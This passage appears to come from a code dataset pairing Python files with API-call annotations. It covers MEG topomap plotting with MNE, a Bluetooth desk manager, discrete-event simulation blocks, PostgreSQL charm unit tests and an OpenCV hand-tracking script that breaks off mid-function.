resampled_ima_t_tpc = np.zeros([array_ttpc.shape[0], array_ttpc.shape[1], len(np.arange(onset_t, end_point, segm))])
for ind, ith_ts in enumerate(np.arange(onset_t, end_point, segm)):
print(range(ith_ts, ith_ts + segm))
if ith_ts + segm < num_dp:
resampled_ima_t_f[..., ind] = np.mean(array_front[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_b[..., ind] = np.mean(array_back[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_l[..., ind] = np.mean(array_left[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_r[..., ind] = np.mean(array_right[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_fpc[..., ind] = np.mean(array_tfpc[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_tpc[..., ind] = np.mean(array_ttpc[..., range(ith_ts, ith_ts + segm)], axis=2)
the_data_set = (resampled_ima_t_l + resampled_ima_t_r)/2 - resampled_ima_t_b
##########################
mean_curr_ima = tval_lr_b
# plot
fig = plt.figure(constrained_layout=False, figsize=[2, 2])
fig.subplots_adjust(left=0.02, right=0.9, bottom=0.02, top=0.98)
num_row = 1
num_col = 1
gs = matplotlib.gridspec.GridSpec(nrows=num_row, ncols=num_col, figure=fig)
images = []
for ax_row in list(range(num_row)):
cur_ax = fig.add_subplot(gs[ax_row])
kwargs = dict(vmin=-5e-14, vmax=5e-14, sensors=False, res=64, names=None, show_names=False,
mask_params={}, outlines='head', contours=6, image_interp='bilinear', show=False,
extrapolate='box')
tp, cn, interp = topomap._plot_topomap(mean_curr_ima, pos, axes=cur_ax,
mask=mask, **kwargs)
images.append(tp)
cax = fig.add_subplot()
cpos = cax.get_position()
cpos.x0 = 0.94
cpos.x1 = 0.96
cpos.y0 = .15
cpos.y1 = .75
cax.set_position(cpos)
cbar = fig.colorbar(images[-1], ax=cax, cax=cax)
# cbar.set_ticks(cn.levels)
cbar.ax.tick_params(labelsize=15)
fig.savefig('/Users/boo/Desktop/example.png')
plt.close()
|
[
"numpy.load",
"mne.io.read_raw_fif",
"mne.pick_types",
"matplotlib.pyplot.close",
"numpy.shape",
"matplotlib.pyplot.figure",
"mne.channels.layout._find_topomap_coords",
"numpy.array",
"mne.Epochs",
"numpy.arange",
"matplotlib.gridspec.GridSpec",
"operator.itemgetter",
"mne.viz.topomap._plot_topomap"
] |
[((3639, 3663), 'numpy.array', 'np.array', (['list_data_back'], {}), '(list_data_back)\n', (3647, 3663), True, 'import numpy as np\n'), ((3677, 3701), 'numpy.array', 'np.array', (['list_data_left'], {}), '(list_data_left)\n', (3685, 3701), True, 'import numpy as np\n'), ((3716, 3741), 'numpy.array', 'np.array', (['list_data_right'], {}), '(list_data_right)\n', (3724, 3741), True, 'import numpy as np\n'), ((3756, 3781), 'numpy.array', 'np.array', (['list_data_front'], {}), '(list_data_front)\n', (3764, 3781), True, 'import numpy as np\n'), ((3795, 3819), 'numpy.array', 'np.array', (['list_data_tfpc'], {}), '(list_data_tfpc)\n', (3803, 3819), True, 'import numpy as np\n'), ((3833, 3857), 'numpy.array', 'np.array', (['list_data_ttpc'], {}), '(list_data_ttpc)\n', (3841, 3857), True, 'import numpy as np\n'), ((5524, 5576), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'constrained_layout': '(False)', 'figsize': '[2, 2]'}), '(constrained_layout=False, figsize=[2, 2])\n', (5534, 5576), True, 'import matplotlib.pyplot as plt\n'), ((5671, 5741), 'matplotlib.gridspec.GridSpec', 'matplotlib.gridspec.GridSpec', ([], {'nrows': 'num_row', 'ncols': 'num_col', 'figure': 'fig'}), '(nrows=num_row, ncols=num_col, figure=fig)\n', (5699, 5741), False, 'import matplotlib\n'), ((6542, 6553), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6551, 6553), True, 'import matplotlib.pyplot as plt\n'), ((1180, 1209), 'mne.io.read_raw_fif', 'read_raw_fif', (['temp_data_array'], {}), '(temp_data_array)\n', (1192, 1209), False, 'from mne.io import read_raw_fif\n'), ((1228, 1256), 'numpy.load', 'numpy.load', (['temp_event_array'], {}), '(temp_event_array)\n', (1238, 1256), False, 'import numpy\n'), ((1328, 1370), 'mne.pick_types', 'mne.pick_types', (['array_data.info'], {'meg': '"""mag"""'}), "(array_data.info, meg='mag')\n", (1342, 1370), False, 'import mne\n'), ((1470, 1546), 'mne.channels.layout._find_topomap_coords', 'mne.channels.layout._find_topomap_coords', (['array_data.info', 'picks_mag[29:301]'], {}), '(array_data.info, picks_mag[29:301])\n', (1510, 1546), False, 'import mne\n'), ((1864, 2001), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_back', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_back, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (1874, 2001), False, 'import mne\n'), ((2045, 2183), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_front', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_front, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2055, 2183), False, 'import mne\n'), ((2227, 2364), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_left', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_left, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2237, 2364), False, 'import mne\n'), ((2408, 2546), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_right', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_right, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2418, 2546), False, 'import mne\n'), ((2590, 2727), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_tfpc', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_tfpc, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2600, 2727), False, 'import mne\n'), ((2770, 2907), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_ttpc', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_ttpc, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2780, 2907), False, 'import mne\n'), ((3905, 3925), 'numpy.shape', 'np.shape', (['array_back'], {}), '(array_back)\n', (3913, 3925), True, 'import numpy as np\n'), ((4657, 4692), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4666, 4692), True, 'import numpy as np\n'), ((6105, 6180), 'mne.viz.topomap._plot_topomap', 'topomap._plot_topomap', (['mean_curr_ima', 'pos'], {'axes': 'cur_ax', 'mask': 'mask'}), '(mean_curr_ima, pos, axes=cur_ax, mask=mask, **kwargs)\n', (6126, 6180), False, 'from mne.viz import topomap\n'), ((1389, 1411), 'operator.itemgetter', 'itemgetter', (['*picks_mag'], {}), '(*picks_mag)\n', (1399, 1411), False, 'from operator import itemgetter\n'), ((4008, 4043), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4017, 4043), True, 'import numpy as np\n'), ((4123, 4158), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4132, 4158), True, 'import numpy as np\n'), ((4238, 4273), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4247, 4273), True, 'import numpy as np\n'), ((4355, 4390), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4364, 4390), True, 'import numpy as np\n'), ((4472, 4507), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4481, 4507), True, 'import numpy as np\n'), ((4589, 4624), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4598, 4624), True, 'import numpy as np\n')]
|
from time import sleep
from bluepy.btle import Scanner, Peripheral, ADDR_TYPE_RANDOM, DefaultDelegate, ScanEntry, BTLEException
from .config import Config
from .desks import factory, DefaultDesk
class DeskManager:
MAX_CONNECTION_ATTEMPTS = 5
def __init__(self):
self._scanner = Scanner()
self._peripheral = Peripheral()
self._desk = None
self.config = Config()
def scan_devices(self) -> [ScanEntry]:
scan_entries = self._scanner.scan()
return [ entry for entry in scan_entries ]
def disconnect(self):
self._peripheral.disconnect()
def connect(self, device_addr):
connected = False
error = None
for _ in range(self.MAX_CONNECTION_ATTEMPTS):
try:
self._peripheral.connect(device_addr, ADDR_TYPE_RANDOM)
except BTLEException as e:
print("Connection failed: " + str(e))
sleep(0.3)
error = e
continue
else:
connected = True
break
if connected is False:
raise error
self._desk = factory(self._peripheral, device_addr)
if self._desk is None:
raise Exception("Device is not supported")
@property
def is_connected(self):
return self.desk.position is not None if self.desk is not None else False
@property
def desk(self) -> DefaultDesk:
return self._desk
|
[
"bluepy.btle.Scanner",
"time.sleep",
"bluepy.btle.Peripheral"
] |
[((298, 307), 'bluepy.btle.Scanner', 'Scanner', ([], {}), '()\n', (305, 307), False, 'from bluepy.btle import Scanner, Peripheral, ADDR_TYPE_RANDOM, DefaultDelegate, ScanEntry, BTLEException\n'), ((335, 347), 'bluepy.btle.Peripheral', 'Peripheral', ([], {}), '()\n', (345, 347), False, 'from bluepy.btle import Scanner, Peripheral, ADDR_TYPE_RANDOM, DefaultDelegate, ScanEntry, BTLEException\n'), ((946, 956), 'time.sleep', 'sleep', (['(0.3)'], {}), '(0.3)\n', (951, 956), False, 'from time import sleep\n')]
|
"""seize process release"""
from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue
from casymda.blocks.block_components import VisualizableBlock
class SeizeProcessRelease(VisualizableBlock):
"""entities in this block follow the process:
request resource, be processed, release resource"""
def __init__(
self, env, name, xy=None, ways=None, process_time=1.0, resource_capacity=1
):
super().__init__(env, name, xy=xy, ways=ways)
self.resource = NamedResource(self.env, "resource", capacity=resource_capacity)
self.receiver = Receiver(self.env)
self.seizer = ResourceSeizeQueue(
env, self.name + "_seizer", resource=self.resource
)
self.seizer.successors.append(self.receiver)
self.processor = Delay(env, self.name + "_processor", process_time=process_time)
self.processor.successors.append(self.receiver)
self.releaser = ResourceRelease(
env, self.name + "_releaser", resource=self.resource
)
self.releaser.successors.append(self.receiver)
def actual_processing(self, entity):
yield self.env.process(self.seizer.process_entity(entity))
yield self.env.process(self.processor.process_entity(entity))
yield self.env.process(self.releaser.process_entity(entity))
class Receiver:
"""receiver class to act as successor for inner blocks"""
def __init__(self, env):
self.env = env
self.block_resource = NamedResource(env, "receiver_resource", capacity=1)
def process_entity(self, entity):
"""just release the resource"""
yield self.block_resource.release(entity.block_resource_request)
|
[
"casymda.blocks.NamedResource",
"casymda.blocks.Delay",
"casymda.blocks.ResourceSeizeQueue",
"casymda.blocks.ResourceRelease"
] |
[((517, 580), 'casymda.blocks.NamedResource', 'NamedResource', (['self.env', '"""resource"""'], {'capacity': 'resource_capacity'}), "(self.env, 'resource', capacity=resource_capacity)\n", (530, 580), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n'), ((648, 718), 'casymda.blocks.ResourceSeizeQueue', 'ResourceSeizeQueue', (['env', "(self.name + '_seizer')"], {'resource': 'self.resource'}), "(env, self.name + '_seizer', resource=self.resource)\n", (666, 718), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n'), ((819, 882), 'casymda.blocks.Delay', 'Delay', (['env', "(self.name + '_processor')"], {'process_time': 'process_time'}), "(env, self.name + '_processor', process_time=process_time)\n", (824, 882), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n'), ((963, 1032), 'casymda.blocks.ResourceRelease', 'ResourceRelease', (['env', "(self.name + '_releaser')"], {'resource': 'self.resource'}), "(env, self.name + '_releaser', resource=self.resource)\n", (978, 1032), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n'), ((1521, 1572), 'casymda.blocks.NamedResource', 'NamedResource', (['env', '"""receiver_resource"""'], {'capacity': '(1)'}), "(env, 'receiver_resource', capacity=1)\n", (1534, 1572), False, 'from casymda.blocks import Delay, NamedResource, ResourceRelease, ResourceSeizeQueue\n')]
|
# Copyright 2021 Canonical Ltd.
# See LICENSE file for licensing details.
import re
import subprocess
import unittest
from unittest.mock import Mock, patch
from charms.operator_libs_linux.v0 import apt
from ops.model import ActiveStatus, BlockedStatus, WaitingStatus
from ops.testing import Harness
from charm import PostgresqlOperatorCharm
from tests.helpers import patch_network_get
class TestCharm(unittest.TestCase):
@patch_network_get(private_address="1.1.1.1")
def setUp(self):
self._peer_relation = "postgresql-replicas"
self._postgresql_container = "postgresql"
self._postgresql_service = "postgresql"
self.harness = Harness(PostgresqlOperatorCharm)
self.addCleanup(self.harness.cleanup)
self.harness.begin()
self.charm = self.harness.charm
@patch("charm.PostgresqlOperatorCharm._install_pip_packages")
@patch("charm.PostgresqlOperatorCharm._install_apt_packages")
@patch("charm.Patroni.inhibit_default_cluster_creation")
def test_on_install(
self, _inhibit_default_cluster_creation, _install_apt_packages, _install_pip_packages
):
# Test without adding Patroni resource.
self.charm.on.install.emit()
# Assert that the needed calls were made.
_inhibit_default_cluster_creation.assert_called_once()
_install_apt_packages.assert_called_once()
# Assert that the needed calls were made.
_install_pip_packages.assert_not_called()
# Assert the status set by the event handler.
self.assertTrue(isinstance(self.harness.model.unit.status, BlockedStatus))
# Add an empty file as Patroni resource just to check that the correct calls were made.
self.harness.add_resource("patroni", "")
self.charm.on.install.emit()
_install_pip_packages.assert_called_once()
# Assert the status set by the event handler.
self.assertTrue(isinstance(self.harness.model.unit.status, WaitingStatus))
@patch("charm.PostgresqlOperatorCharm._install_pip_packages")
@patch("charm.PostgresqlOperatorCharm._install_apt_packages")
@patch("charm.Patroni.inhibit_default_cluster_creation")
def test_on_install_apt_failure(
self, _inhibit_default_cluster_creation, _install_apt_packages, _install_pip_packages
):
# Mock the result of the call.
_install_apt_packages.side_effect = apt.PackageNotFoundError
# Trigger the hook.
self.charm.on.install.emit()
# Assert that the needed calls were made.
_inhibit_default_cluster_creation.assert_called_once()
_install_apt_packages.assert_called_once()
_install_pip_packages.assert_not_called()
self.assertTrue(isinstance(self.harness.model.unit.status, BlockedStatus))
@patch("charm.PostgresqlOperatorCharm._install_pip_packages")
@patch("charm.PostgresqlOperatorCharm._install_apt_packages")
@patch("charm.Patroni.inhibit_default_cluster_creation")
def test_on_install_pip_failure(
self, _inhibit_default_cluster_creation, _install_apt_packages, _install_pip_packages
):
# Mock the result of the call.
_install_pip_packages.side_effect = subprocess.CalledProcessError(
cmd="pip3 install patroni", returncode=1
)
# Add an empty file as Patroni resource just to check that the correct calls were made.
self.harness.add_resource("patroni", "")
self.charm.on.install.emit()
# Assert that the needed calls were made.
_inhibit_default_cluster_creation.assert_called_once()
_install_apt_packages.assert_called_once()
_install_pip_packages.assert_called_once()
self.assertTrue(isinstance(self.harness.model.unit.status, BlockedStatus))
def test_on_leader_elected(self):
# Assert that there is no password in the peer relation.
self.harness.add_relation(self._peer_relation, self.charm.app.name)
self.assertIsNone(self.charm._peers.data[self.charm.app].get("postgres-password", None))
# Check that a new password was generated on leader election.
self.harness.set_leader()
password = self.charm._peers.data[self.charm.app].get("postgres-password", None)
self.assertIsNotNone(password)
# Trigger a new leader election and check that the password is still the same.
self.harness.set_leader(False)
self.harness.set_leader()
self.assertEqual(
self.charm._peers.data[self.charm.app].get("postgres-password", None), password
)
@patch("charm.Patroni.bootstrap_cluster")
@patch(
"charm.PostgresqlOperatorCharm._replication_password", return_value="fake-replication-pw"
)
@patch("charm.PostgresqlOperatorCharm._get_postgres_password", return_value=None)
def test_on_start(self, _get_postgres_password, _replication_password, _bootstrap_cluster):
# Test before the passwords are generated.
self.charm.on.start.emit()
_bootstrap_cluster.assert_not_called()
self.assertTrue(isinstance(self.harness.model.unit.status, WaitingStatus))
# Mock the generated superuser password.
_get_postgres_password.return_value = "<PASSWORD>"
# Mock cluster start success values.
_bootstrap_cluster.side_effect = [False, True]
# Test for a failed cluster bootstrapping.
self.charm.on.start.emit()
_bootstrap_cluster.assert_called_once()
self.assertTrue(isinstance(self.harness.model.unit.status, BlockedStatus))
# Set an initial waiting status (like after the install hook was triggered).
self.harness.model.unit.status = WaitingStatus("fake message")
# Then test the event of a correct cluster bootstrapping.
self.charm.on.start.emit()
self.assertTrue(isinstance(self.harness.model.unit.status, ActiveStatus))
@patch("charm.Patroni.bootstrap_cluster")
@patch("charm.PostgresqlOperatorCharm._replication_password")
@patch("charm.PostgresqlOperatorCharm._get_postgres_password")
def test_on_start_after_blocked_state(
self, _get_postgres_password, _replication_password, _bootstrap_cluster
):
# Set an initial blocked status (like after the install hook was triggered).
initial_status = BlockedStatus("fake message")
self.harness.model.unit.status = initial_status
# Test for a failed cluster bootstrapping.
self.charm.on.start.emit()
_get_postgres_password.assert_not_called()
_replication_password.assert_not_called()
_bootstrap_cluster.assert_not_called()
# Assert the status didn't change.
self.assertEqual(self.harness.model.unit.status, initial_status)
@patch("charm.PostgresqlOperatorCharm._get_postgres_password")
def test_on_get_postgres_password(self, _get_postgres_password):
mock_event = Mock()
_get_postgres_password.return_value = "<PASSWORD>"
self.charm._on_get_initial_password(mock_event)
_get_postgres_password.assert_called_once()
mock_event.set_results.assert_called_once_with({"postgres-password": "<PASSWORD>"})
def test_get_postgres_password(self):
# Test for a None password.
self.harness.add_relation(self._peer_relation, self.charm.app.name)
self.assertIsNone(self.charm._get_postgres_password())
# Then test for a non empty password after leader election and peer data set.
self.harness.set_leader()
password = self.charm._get_postgres_password()
self.assertIsNotNone(password)
self.assertNotEqual(password, "")
@patch("charms.operator_libs_linux.v0.apt.add_package")
@patch("charms.operator_libs_linux.v0.apt.update")
def test_install_apt_packages(self, _update, _add_package):
mock_event = Mock()
# Mock the returns of apt-get update calls.
_update.side_effect = [
subprocess.CalledProcessError(returncode=1, cmd="apt-get update"),
None,
None,
]
# Test for problem with apt update.
with self.assertRaises(subprocess.CalledProcessError):
self.charm._install_apt_packages(mock_event, ["postgresql"])
_update.assert_called_once()
# Test with a not found package.
_add_package.side_effect = apt.PackageNotFoundError
with self.assertRaises(apt.PackageNotFoundError):
self.charm._install_apt_packages(mock_event, ["postgresql"])
_update.assert_called()
_add_package.assert_called_with("postgresql")
# Then test a valid one.
_update.reset_mock()
_add_package.reset_mock()
_add_package.side_effect = None
self.charm._install_apt_packages(mock_event, ["postgresql"])
_update.assert_called_once()
_add_package.assert_called_with("postgresql")
@patch("subprocess.call")
def test_install_pip_packages(self, _call):
# Fake pip packages.
packages = ["package1", "package2"]
_call.side_effect = [None, subprocess.SubprocessError]
# Then test for a succesful install.
self.charm._install_pip_packages(packages)
# Check that check_call was invoked with the correct arguments.
_call.assert_called_once_with(
[
"pip3",
"install",
"package1 package2",
]
)
# Assert the status set by the event handler.
self.assertFalse(isinstance(self.harness.model.unit.status, BlockedStatus))
# Then, test for an error.
with self.assertRaises(subprocess.SubprocessError):
self.charm._install_pip_packages(packages)
def test_new_password(self):
# Test the password generation twice in order to check if we get different passwords and
# that they meet the required criteria.
first_password = self.charm._new_password()
self.assertEqual(len(first_password), 16)
self.assertIsNotNone(re.fullmatch("[a-zA-Z0-9\b]{16}$", first_password))
second_password = self.charm._new_password()
self.assertIsNotNone(re.fullmatch("[a-zA-Z0-9\b]{16}$", second_password))
self.assertNotEqual(second_password, first_password)
|
[
"re.fullmatch",
"ops.testing.Harness",
"ops.model.WaitingStatus",
"ops.model.BlockedStatus",
"unittest.mock.Mock",
"unittest.mock.patch",
"tests.helpers.patch_network_get",
"subprocess.CalledProcessError"
] |
[((431, 475), 'tests.helpers.patch_network_get', 'patch_network_get', ([], {'private_address': '"""1.1.1.1"""'}), "(private_address='1.1.1.1')\n", (448, 475), False, 'from tests.helpers import patch_network_get\n'), ((825, 885), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_pip_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_pip_packages')\n", (830, 885), False, 'from unittest.mock import Mock, patch\n'), ((891, 951), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_apt_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_apt_packages')\n", (896, 951), False, 'from unittest.mock import Mock, patch\n'), ((957, 1012), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.inhibit_default_cluster_creation"""'], {}), "('charm.Patroni.inhibit_default_cluster_creation')\n", (962, 1012), False, 'from unittest.mock import Mock, patch\n'), ((2002, 2062), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_pip_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_pip_packages')\n", (2007, 2062), False, 'from unittest.mock import Mock, patch\n'), ((2068, 2128), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_apt_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_apt_packages')\n", (2073, 2128), False, 'from unittest.mock import Mock, patch\n'), ((2134, 2189), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.inhibit_default_cluster_creation"""'], {}), "('charm.Patroni.inhibit_default_cluster_creation')\n", (2139, 2189), False, 'from unittest.mock import Mock, patch\n'), ((2804, 2864), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_pip_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_pip_packages')\n", (2809, 2864), False, 'from unittest.mock import Mock, patch\n'), ((2870, 2930), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._install_apt_packages"""'], {}), "('charm.PostgresqlOperatorCharm._install_apt_packages')\n", (2875, 2930), False, 'from unittest.mock import Mock, patch\n'), ((2936, 2991), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.inhibit_default_cluster_creation"""'], {}), "('charm.Patroni.inhibit_default_cluster_creation')\n", (2941, 2991), False, 'from unittest.mock import Mock, patch\n'), ((4592, 4632), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.bootstrap_cluster"""'], {}), "('charm.Patroni.bootstrap_cluster')\n", (4597, 4632), False, 'from unittest.mock import Mock, patch\n'), ((4638, 4739), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._replication_password"""'], {'return_value': '"""fake-replication-pw"""'}), "('charm.PostgresqlOperatorCharm._replication_password', return_value=\n 'fake-replication-pw')\n", (4643, 4739), False, 'from unittest.mock import Mock, patch\n'), ((4754, 4839), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._get_postgres_password"""'], {'return_value': 'None'}), "('charm.PostgresqlOperatorCharm._get_postgres_password', return_value=None\n )\n", (4759, 4839), False, 'from unittest.mock import Mock, patch\n'), ((5922, 5962), 'unittest.mock.patch', 'patch', (['"""charm.Patroni.bootstrap_cluster"""'], {}), "('charm.Patroni.bootstrap_cluster')\n", (5927, 5962), False, 'from unittest.mock import Mock, patch\n'), ((5968, 6028), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._replication_password"""'], {}), "('charm.PostgresqlOperatorCharm._replication_password')\n", (5973, 6028), False, 'from unittest.mock import Mock, patch\n'), ((6034, 6095), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._get_postgres_password"""'], {}), "('charm.PostgresqlOperatorCharm._get_postgres_password')\n", (6039, 6095), False, 'from unittest.mock import Mock, patch\n'), ((6779, 6840), 'unittest.mock.patch', 'patch', (['"""charm.PostgresqlOperatorCharm._get_postgres_password"""'], {}), "('charm.PostgresqlOperatorCharm._get_postgres_password')\n", (6784, 6840), False, 'from unittest.mock import Mock, patch\n'), ((7678, 7732), 'unittest.mock.patch', 'patch', (['"""charms.operator_libs_linux.v0.apt.add_package"""'], {}), "('charms.operator_libs_linux.v0.apt.add_package')\n", (7683, 7732), False, 'from unittest.mock import Mock, patch\n'), ((7738, 7787), 'unittest.mock.patch', 'patch', (['"""charms.operator_libs_linux.v0.apt.update"""'], {}), "('charms.operator_libs_linux.v0.apt.update')\n", (7743, 7787), False, 'from unittest.mock import Mock, patch\n'), ((8942, 8966), 'unittest.mock.patch', 'patch', (['"""subprocess.call"""'], {}), "('subprocess.call')\n", (8947, 8966), False, 'from unittest.mock import Mock, patch\n'), ((671, 703), 'ops.testing.Harness', 'Harness', (['PostgresqlOperatorCharm'], {}), '(PostgresqlOperatorCharm)\n', (678, 703), False, 'from ops.testing import Harness\n'), ((3213, 3284), 'subprocess.CalledProcessError', 'subprocess.CalledProcessError', ([], {'cmd': '"""pip3 install patroni"""', 'returncode': '(1)'}), "(cmd='pip3 install patroni', returncode=1)\n", (3242, 3284), False, 'import subprocess\n'), ((5702, 5731), 'ops.model.WaitingStatus', 'WaitingStatus', (['"""fake message"""'], {}), "('fake message')\n", (5715, 5731), False, 'from ops.model import ActiveStatus, BlockedStatus, WaitingStatus\n'), ((6336, 6365), 'ops.model.BlockedStatus', 'BlockedStatus', (['"""fake message"""'], {}), "('fake message')\n", (6349, 6365), False, 'from ops.model import ActiveStatus, BlockedStatus, WaitingStatus\n'), ((6931, 6937), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (6935, 6937), False, 'from unittest.mock import Mock, patch\n'), ((7873, 7879), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (7877, 7879), False, 'from unittest.mock import Mock, patch\n'), ((7977, 8042), 'subprocess.CalledProcessError', 'subprocess.CalledProcessError', ([], {'returncode': '(1)', 'cmd': '"""apt-get update"""'}), "(returncode=1, cmd='apt-get update')\n", (8006, 8042), False, 'import subprocess\n'), ((10085, 10137), 're.fullmatch', 're.fullmatch', (['"""[a-zA-Z0-9\x08]{16}$"""', 'first_password'], {}), "('[a-zA-Z0-9\\x08]{16}$', first_password)\n", (10097, 10137), False, 'import re\n'), ((10220, 10273), 're.fullmatch', 're.fullmatch', (['"""[a-zA-Z0-9\x08]{16}$"""', 'second_password'], {}), "('[a-zA-Z0-9\\x08]{16}$', second_password)\n", (10232, 10273), False, 'import re\n')]
|
import cv2
import numpy as np
import pyautogui
hand_hist = None
traverse_point = []
total_rectangle = 9
hand_rect_one_x = None
hand_rect_one_y = None
hand_rect_two_x = None
hand_rect_two_y = None
def rescale_frame(frame, wpercent=130, hpercent=130):
width = int(frame.shape[1] * wpercent / 100)
height = int(frame.shape[0] * hpercent / 100)
return cv2.resize(frame, (width, height), interpolation=cv2.INTER_AREA)
def contours(hist_mask_image):
gray_hist_mask_image = cv2.cvtColor(hist_mask_image, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(gray_hist_mask_image, 0, 255, 0)
cont, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
return cont
def draw_rect(frame):
rows, cols, _ = frame.shape
global total_rectangle, hand_rect_one_x, hand_rect_one_y, hand_rect_two_x, hand_rect_two_y
hand_rect_one_x = np.array(
[6 * rows / 20, 6 * rows / 20, 6 * rows / 20, 9 * rows / 20, 9 * rows / 20, 9 * rows / 20, 12 * rows / 20,
12 * rows / 20, 12 * rows / 20], dtype=np.uint32)
hand_rect_one_y = np.array(
[9 * cols / 20, 10 * cols / 20, 11 * cols / 20, 9 * cols / 20, 10 * cols / 20, 11 * cols / 20, 9 * cols / 20,
10 * cols / 20, 11 * cols / 20], dtype=np.uint32)
hand_rect_two_x = hand_rect_one_x + 10
hand_rect_two_y = hand_rect_one_y + 10
for i in range(total_rectangle):
cv2.rectangle(frame, (hand_rect_one_y[i], hand_rect_one_x[i]),
(hand_rect_two_y[i], hand_rect_two_x[i]),
(0, 255, 0), 1)
return frame
def hand_histogram(frame):
global hand_rect_one_x, hand_rect_one_y
hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
roi = np.zeros([90, 10, 3], dtype=hsv_frame.dtype)
for i in range(total_rectangle):
roi[i * 10: i * 10 + 10, 0: 10] = hsv_frame[hand_rect_one_x[i]:hand_rect_one_x[i] + 10,
hand_rect_one_y[i]:hand_rect_one_y[i] + 10]
hand_hist = cv2.calcHist([roi], [0, 1], None, [180, 256], [0, 180, 0, 256])
return cv2.normalize(hand_hist, hand_hist, 0, 255, cv2.NORM_MINMAX)
def hist_masking(frame, hist):
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([hsv], [0, 1], hist, [0, 180, 0, 256], 1)
disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (31, 31))
cv2.filter2D(dst, -1, disc, dst)
ret, thresh = cv2.threshold(dst, 150, 255, cv2.THRESH_BINARY)
# thresh = cv2.dilate(thresh, None, iterations=5)
thresh = cv2.merge((thresh, thresh, thresh))
return cv2.bitwise_and(frame, thresh)
def centroid(max_contour):
moment = cv2.moments(max_contour)
if moment['m00'] != 0:
cx = int(moment['m10'] / moment['m00'])
